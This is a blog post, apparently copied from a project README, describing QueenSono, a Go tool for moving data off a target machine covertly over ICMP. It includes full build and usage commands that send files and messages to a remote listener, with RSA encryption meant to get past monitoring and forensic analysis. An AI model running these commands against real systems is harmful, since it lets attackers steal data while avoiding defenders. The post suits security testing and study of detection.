Kali Linux

QueenoSno : Golang Binary For Data Exfiltration With ICMP Protocol

QueenSono tool only relies on the fact that ICMP protocol isn’t monitored. It is quite common. It could also been used within a system with basic ICMP inspection (ie. frequency and content length watcher) or to bypass authentication step with captive portal (used by many public Wi-Fi to authenticate users after connecting to the Wi-Fi e.g Airport Wi-Fi). Try to imitate PyExfil (and others) with the idea that the target machine does not necessary have python installed (so provide a binary could be useful).

Install

> Install the binary from source

Clone the repo and download the dependencies locally:

git clone https://github.com/ariary/QueenSono.git
make before.build

To build the ICMP packet sender qssender :

build.queensono-sender

To build the ICMP packet receiver qsreceiver :

build.queensono-receiver

Usage

qssender is the binary which will send ICMP packet to the listener , so it is the binary you have to transfer on your target machine.

qsreceiver is the listener on your local machine (or wherever you could receive icmp packet)

All commands and flags of the binaries could be found using --help

Example 1: Send with “ACK” 

> In this example we want to send a big file and look after echo reply to ackowledge the reception of the packets (ACK).

On local machine:

$ qsreceiver receive -l 0.0.0.0 -p -f received_bible.txt

Explanation

On target machine:

$ wget https://raw.githubusercontent.com/mxw/grmr/master/src/finaltests/bible.txt #download a huge file (for the example)
$ qssender send file -d 2 -l 127.0.0.1 -r 10.0.0.92 -s 50000 bible.txt

Explanation

Example 2: Send without “ACK” 

> In this example we want to send a message without waiting for echo reply (it could be useful in case the target firewall filters incoming icmp packet)

On local machine:

$ qsreceiver receive truncated 1 -l 0.0.0.0

Explanation

On target machine:

$ qssender send “thisisatest i want to send a string w/o waiting for the echo reply” -d 1 -l 127.0.0.1 -r 10.0.0.190 -s 1 -N

Example 3: Send encrypted data 

> In this example we want to send an encrypted message. As the command line could be spied on we use asymmetric encryption

On local machine:

$ qsreceiver receive -l 0.0.0.0 –encrypt

Explanation

On target machine:

$ qssender send “don’t worry this message was encrypted with the public key. only you could decrypt it” -d 1 -l 127.0.0.1 -r 10.0.0.190 go.mod -s 5 –encrypt

About Encryption

RSA encrytion is used to keep data exchanged confidential. It could be useful for example to avoid a SoC to see what data is exchanged (or forensic) w/ basic analysis or simply for privacy.

But it comes with a cost. The choice of asymetric encryption is motivated by the fact that the encryption key is entered on the command line (so it could be retieved easily). Hence, we encrypt data with public key. Like this if someone retrieve the encryption key it will not be possible to decrypt the message. But the public key is smaller than the private one, so it encrypt smaller messages. Also, it is computationally expensive.

Another point, as we want to limit data size/ping requests (to avoid detection, bug, etc), use encryption only if needed as the message output-size will (should) always equal the size of the Modulus (part of the key) which is big.


R K

Recent Posts

Kali Linux 2024.4 Released, What’s New?

Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…

3 days ago

Lifetime-Amsi-EtwPatch : Disabling PowerShell’s AMSI And ETW Protections

This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…

3 days ago

GPOHunter – Active Directory Group Policy Security Analyzer

GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…

5 days ago

2024 MITRE ATT&CK Evaluation Results – Cynet Became a Leader With 100% Detection & Protection

Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…

1 week ago

SecHub : Streamlining Security Across Software Development Lifecycles

The free and open-source security platform SecHub, provides a central API to test software with…

1 week ago

Hawker : The Comprehensive OSINT Toolkit For Cybersecurity Professionals

Don't worry if there are any bugs in the tool, we will try to fix…

1 week ago